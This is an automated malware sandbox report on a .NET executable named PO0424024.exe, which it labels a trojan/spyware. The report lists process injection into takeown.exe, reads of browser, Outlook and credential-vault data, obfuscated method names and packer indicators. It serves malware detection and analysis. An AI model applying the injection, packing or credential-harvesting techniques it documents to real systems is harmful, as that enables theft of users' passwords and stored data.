Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, rljZitc2Y0Y5BASKed.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, rljZitc2Y0Y5BASKed.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, lXG347jmgqtSJbUTFQ.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, lXG347jmgqtSJbUTFQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, lXG347jmgqtSJbUTFQ.cs	Security API names: _0020.AddAccessRule

Source: 0.2.PO0424024.exe.6fa0000.11.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.PO0424024.exe.272f628.4.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.PO0424024.exe.2acdcc4.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.PO0424024.exe.273f9e4.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@15/11

Source: C:\Users\user\Desktop\PO0424024.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO0424024.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\PO0424024.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\takeown.exe

File created: C:\Users\user\AppData\Local\Temp\43PI9J

Jump to behavior

Source: PO0424024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO0424024.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO0424024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: takeown.exe, 00000007.00000003.2349097326.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000007.00000002.4158156382.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000007.00000003.2348974519.00000000031C5000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000007.00000003.2351029819.00000000031E6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PO0424024.exe	ReversingLabs: Detection: 31%
Source: PO0424024.exe	Virustotal: Detection: 30%

Source: unknown	Process created: C:\Users\user\Desktop\PO0424024.exe "C:\Users\user\Desktop\PO0424024.exe"
Source: C:\Users\user\Desktop\PO0424024.exe	Process created: C:\Users\user\Desktop\PO0424024.exe "C:\Users\user\Desktop\PO0424024.exe"
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"
Source: C:\Windows\SysWOW64\takeown.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PO0424024.exe	Process created: C:\Users\user\Desktop\PO0424024.exe "C:\Users\user\Desktop\PO0424024.exe"	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\PO0424024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\PO0424024.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\takeown.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: PO0424024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO0424024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: PO0424024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: vgSP.pdb source: PO0424024.exe
Source:	Binary string: takeown.pdbGCTL source: PO0424024.exe, 00000002.00000002.2172583060.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000003.2241898532.0000000000D8F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000000.2094344581.0000000000C0E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO0424024.exe, 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000007.00000003.2174688748.0000000003568000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000007.00000003.2172347160.00000000033B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: takeown.pdb source: PO0424024.exe, 00000002.00000002.2172583060.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000003.2241898532.0000000000D8F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PO0424024.exe, PO0424024.exe, 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, takeown.exe, 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000007.00000003.2174688748.0000000003568000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000007.00000003.2172347160.00000000033B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vgSP.pdbSHA256B source: PO0424024.exe

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.PO0424024.exe.6e70000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: PO0424024.exe, frm_Graph_Drawer.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, lXG347jmgqtSJbUTFQ.cs	.Net Code: vZNsi4Vxjb System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, lXG347jmgqtSJbUTFQ.cs	.Net Code: vZNsi4Vxjb System.Reflection.Assembly.Load(byte[])

Source: PO0424024.exe

Static PE information: 0xA924776D [Thu Dec 4 04:56:13 2059 UTC]

Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_025760F0 push esp; ret	0_2_025762D1
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_02574659 push edx; ret	0_2_0257465A
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_025747D7 push ebx; ret	0_2_025747DA
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_025747DF push ebx; ret	0_2_025747E2
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_025747DB push ebx; ret	0_2_025747DE
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_025748D1 push edi; ret	0_2_025748D2
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_0257489B push esi; ret	0_2_025748A2
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_02574898 push esi; ret	0_2_0257489A
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_0257AE79 pushfd ; ret	0_2_0257AE7A
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_04CCBC1B pushfd ; retf	0_2_04CCBC32
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_04CCBDCF pushfd ; retf	0_2_04CCBDD2
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_04CCBDF0 pushfd ; retf	0_2_04CCBDF2
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_04CCBDF3 pushfd ; retf	0_2_04CCBDFA
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_04CCBD60 pushfd ; retf	0_2_04CCBD62
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_04D937D0 push eax; iretd	0_2_04D937D1
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_04D9CF50 push eax; mov dword ptr [esp], edx	0_2_04D9CF64
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_04D9783F push eax; retf	0_2_04D97855
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 0_2_0710F893 pushfd ; iretd	0_2_0710F894
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00405053 push ebx; retf	2_2_00405057
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_004120FD push ebx; retf	2_2_004121FA
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0041188E push EFD03D13h; retf	2_2_00411893
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0040E197 push ecx; retf	2_2_0040E19A
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0041A996 push ss; iretd	2_2_0041A997
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_004121B7 push ebx; retf	2_2_004121FA
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00415A03 push esi; iretd	2_2_00415A0E
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00401A08 push B865D3CCh; retf	2_2_00401A07
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_004082D1 push eax; retf	2_2_004082DB
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0040A468 push ebp; iretd	2_2_0040A477
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0040A4D5 push eax; ret	2_2_0040A4D6
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00401570 push 3D820602h; retn 74BEh	2_2_004016E4
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0040A534 push FFFFFFDDh; ret	2_2_0040A562

Source: PO0424024.exe

Static PE information: section name: .text entropy: 7.9153685201395305

Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, xf8DemTR0ISrUguC1O.cs	High entropy of concatenated method names: 'edW9l9xt5j', 'qhy9QqhwoQ', 'vNT9AO1Tqf', 'TLJ9TIjJv5', 'otN9t09Zar', 'sYZ9pUjRG9', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, eBYpIxWVls18WZje7r.cs	High entropy of concatenated method names: 'OYI9ZurbWC', 'UPY9j1TvsM', 'jUZ9Dr2eco', 'QfE95leSYA', 'yeM91hUGpq', 'WgG9NVyUFd', 'qPU9bdY8K0', 'Bd49U6a4Op', 'd4h9FAFf2Y', 'pMm9RAWQZH'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, rljZitc2Y0Y5BASKed.cs	High entropy of concatenated method names: 'DmFjtUAaka', 'bywj36g4g1', 'tFXjC1YfB4', 'KhpjyvNOtN', 'Xauj23HFbI', 'AYUjIFionN', 'jVAjWO8DqS', 'R3qjhygHoH', 'EtjjnvIhV2', 'xOFjPICKcM'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, lXG347jmgqtSJbUTFQ.cs	High entropy of concatenated method names: 'LjeBX4dqgk', 'VijBZmq1Uh', 'AllBjxZkr6', 'aMrBDL1oex', 'oclB5u5Yxd', 'PlBB1VblDT', 'dBDBN86cgq', 'VGJBbpIG4E', 'yZ1BU2OZkS', 'Ou6BFjWGp9'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, uYUEXyzt1iYrE6QGDP.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'as68gFsZ6j', 'X2x8dZbT6L', 'VGJ807UqWe', 'Oq08JFv4X3', 'zal89rjJDZ', 'jao88mJ59B', 'rOS8YXiluy'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, ey3HbfxvqqZn9WU7CP.cs	High entropy of concatenated method names: 't3mNMmGRoE', 'MyCN4JNn8T', 'BVXNiFe8CL', 'HgGNES8dWV', 'sn5NHowslL', 'fFHNO2wHIK', 'DBZNLtKyTY', 'dv6NfbwYE7', 'aVYNui3Qd4', 'i4HNxIlMVt'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, n0kSbQGRSvlHte8Eib.cs	High entropy of concatenated method names: 'WA2DE5vqIT', 'aRkDOOgKjK', 'T2ZDf4GkIo', 'GCMDuUhFI5', 'cZ2DdAXlWG', 'mNqD0tEn5C', 'HwcDJTOueh', 'rDKD9t1XfJ', 'VnbD8mhN1R', 'rl6DYeUc35'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, bA3SS5wJKrXALX79qC.cs	High entropy of concatenated method names: 'KmxJFZfYVQ', 'X3fJRfBKKe', 'ToString', 'RSHJZGvhwF', 'F7HJjoJEyU', 'W1jJDf2mue', 'sF2J5uLaLk', 'qNhJ1XehYo', 'N2WJNuiNfu', 'ta7JbePFKo'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, KGeVZ28UIBVNOkPHmF.cs	High entropy of concatenated method names: 'Dispose', 'kScrnhTsoW', 'r7c6QMPEKn', 'UwoGGkv0vR', 'iE9rPvXNMj', 'QZwrzYTi76', 'ProcessDialogKey', 'Thb6kWZ6qF', 'yoL6rGSrNe', 'zTl66rjInE'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, n1EW1fa7RmuHh2eHM9w.cs	High entropy of concatenated method names: 'TvL8MtbMHQ', 'yUN848Zb32', 'Dsi8iqCRt6', 'OoO8EMcOQF', 'rEg8Hri0ix', 'IoC8O2RKvt', 'god8LmwVUF', 'XHs8fduDbB', 'zLD8uOLi6r', 'fn08xHlIt6'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, YSxpOUA4uyf5JdNj1C.cs	High entropy of concatenated method names: 'su5dScxUtQ', 'GGTdKC7MgQ', 'EaUdtZ3R2m', 'Ubgd3sk4c5', 'xeydQds1Nv', 'yvsdAQhYOe', 'DKJdTAdxXJ', 'OWodp3r7Pu', 'aS8dVVvvwS', 'nxpdqgZo2p'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, m09LbGHvOCXuOlhAVi.cs	High entropy of concatenated method names: 'sJKNZJmK0d', 'OQeNDXBBuX', 'my8N1oRpVo', 'ytc1PynGb0', 'IKD1zVk84N', 'awONkiFIqd', 'e9QNr1H1iI', 'ufrN6ySxA0', 'a8ZNBqcHPR', 'L3ZNsmdppw'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, jaKfEhvVHNriyUHBD5.cs	High entropy of concatenated method names: 'rxt5H1UaLd', 'LyO5LlCpcT', 'eIgDAL5O7a', 'LNmDT5PEpB', 'JX4DpnPCnk', 'da5DVnJwY9', 'pkDDqRjRkD', 'cPtDwnF1Li', 'Wg2DeaGPb6', 'sZjDSZo8v0'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, TdpK7UBYZRso2FLCgU.cs	High entropy of concatenated method names: 'NA0Jhep55i', 'R7OJPSxUU4', 'xTA9ktWs0l', 'Tve9rhE5ky', 'TYRJvVcvBa', 'xssJK2MUFV', 'RkHJmdqH1d', 'HwDJt5ryVF', 'kITJ35k2Hr', 'CpkJCNHtbF'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, HNrGVVaRFHRt9wE1yIH.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KLZYtwwt4M', 'HeKY3RLRBI', 'f4oYCik7Re', 'O57YyeoAbG', 'F08Y2et9mM', 'bW2YISPhOY', 'mN9YWUPIwq'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, S4cgTPaaQ63YDrb3WEb.cs	High entropy of concatenated method names: 'ToString', 'gS9YB59Dv5', 'rhWYsi1gWt', 'wrbYXuT0RD', 's65YZc8k3N', 'g4FYjehAW0', 'drPYDht3br', 'uoiY5RMHje', 'qMvIaLpBgSrMUhhO7RD', 'lax7M7pHwCLP2iVxmXH'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, HsvUApVHHAG66pB3Hb.cs	High entropy of concatenated method names: 'qJF1XAxmTd', 'jpw1jFEGJf', 'may158qcJs', 'Ymk1NXTu8E', 'nQT1b88pyg', 'Wgg52DahZv', 'Yv85IOUgFO', 'UJ45WOvcIO', 'nrb5hi1u6r', 'mtn5n9K3Qt'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, LrIAQpqtGcG7NuVqi1.cs	High entropy of concatenated method names: 'O8UbjcKDeOmRuavJwmh', 'eGcJi2KRFnKbpqa8IZW', 'xb6L51KGr7L3PM8U4EB', 'b4Q19KAmrt', 'Heg18qpow3', 'QNF1YWPA4N', 'AQosqHKVuoJsCV9QoJA', 'gb5db3Ki8ZySkkFULu2', 'Jw9B1KKCLC5QN2rFFsH'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, sAO7rj2vMbNiiAhvyA.cs	High entropy of concatenated method names: 'c1hgfds8nC', 'MKpguKMWWa', 'oHLglJ2Y6P', 'T6WgQEdwWT', 'CiJgTQnSq4', 'FhBgpjywx3', 'LHBgqY38CD', 'gOIgwlfFxk', 'ooggSNRUVM', 'SEOgvCPM6N'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, ayiQZall1kUmx0W6Gb.cs	High entropy of concatenated method names: 'aLbie5RHp', 'N8OES2sHA', 'CEOOOpfqR', 'IttLgler6', 'YvkucaUKW', 'JG3xZwAR1', 'MyBFtuwulVybd7tnvi', 'cIVklsm68nhQxSstak', 'UOS9LVkEm', 'TekYCvxpU'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, WNlJvjLnRnZodIGnuR.cs	High entropy of concatenated method names: 'fGd8rtiLps', 'gHH8BX8m4F', 'aUj8sBIVB7', 'sTu8ZBQ8u3', 'f168jucpQ0', 'nVb85ZYpRv', 'X5681sJNoe', 'xCv9WaAWd3', 'zyt9hPl0s0', 'FYv9nTBufc'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, vfniaBJA1eeHlImvxN.cs	High entropy of concatenated method names: 'bT6rNgRsWI', 'lG6rb3vkNa', 'I1urFWsR1v', 'kGcrRHbteM', 'Uv0rdJMnbp', 'pv2r0UlPZ7', 'XnVoVAxRS1V02DuQk0', 'ANXSf0gkvEGrsU2KTN', 'kmGrryfgJQ', 'h8nrBjT1j8'
Source: 0.2.PO0424024.exe.438ee30.7.raw.unpack, tcpnC1NfLeotSQH8gi.cs	High entropy of concatenated method names: 'ToString', 'Rkr0vEW2qG', 'oJx0QGfEt5', 'h6y0AZ2vnP', 'Iaw0TTZmhl', 'cqh0pWN6cX', 'UEd0VSDo04', 'xAD0qtdiHi', 'O5P0wneSme', 'F3H0eoQqIE'
Source: 0.2.PO0424024.exe.6e70000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs	High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
Source: 0.2.PO0424024.exe.6e70000.10.raw.unpack, vpednoN8EZgsJ4TDwx.cs	High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, xf8DemTR0ISrUguC1O.cs	High entropy of concatenated method names: 'edW9l9xt5j', 'qhy9QqhwoQ', 'vNT9AO1Tqf', 'TLJ9TIjJv5', 'otN9t09Zar', 'sYZ9pUjRG9', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, eBYpIxWVls18WZje7r.cs	High entropy of concatenated method names: 'OYI9ZurbWC', 'UPY9j1TvsM', 'jUZ9Dr2eco', 'QfE95leSYA', 'yeM91hUGpq', 'WgG9NVyUFd', 'qPU9bdY8K0', 'Bd49U6a4Op', 'd4h9FAFf2Y', 'pMm9RAWQZH'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, rljZitc2Y0Y5BASKed.cs	High entropy of concatenated method names: 'DmFjtUAaka', 'bywj36g4g1', 'tFXjC1YfB4', 'KhpjyvNOtN', 'Xauj23HFbI', 'AYUjIFionN', 'jVAjWO8DqS', 'R3qjhygHoH', 'EtjjnvIhV2', 'xOFjPICKcM'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, lXG347jmgqtSJbUTFQ.cs	High entropy of concatenated method names: 'LjeBX4dqgk', 'VijBZmq1Uh', 'AllBjxZkr6', 'aMrBDL1oex', 'oclB5u5Yxd', 'PlBB1VblDT', 'dBDBN86cgq', 'VGJBbpIG4E', 'yZ1BU2OZkS', 'Ou6BFjWGp9'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, uYUEXyzt1iYrE6QGDP.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'as68gFsZ6j', 'X2x8dZbT6L', 'VGJ807UqWe', 'Oq08JFv4X3', 'zal89rjJDZ', 'jao88mJ59B', 'rOS8YXiluy'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, ey3HbfxvqqZn9WU7CP.cs	High entropy of concatenated method names: 't3mNMmGRoE', 'MyCN4JNn8T', 'BVXNiFe8CL', 'HgGNES8dWV', 'sn5NHowslL', 'fFHNO2wHIK', 'DBZNLtKyTY', 'dv6NfbwYE7', 'aVYNui3Qd4', 'i4HNxIlMVt'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, n0kSbQGRSvlHte8Eib.cs	High entropy of concatenated method names: 'WA2DE5vqIT', 'aRkDOOgKjK', 'T2ZDf4GkIo', 'GCMDuUhFI5', 'cZ2DdAXlWG', 'mNqD0tEn5C', 'HwcDJTOueh', 'rDKD9t1XfJ', 'VnbD8mhN1R', 'rl6DYeUc35'
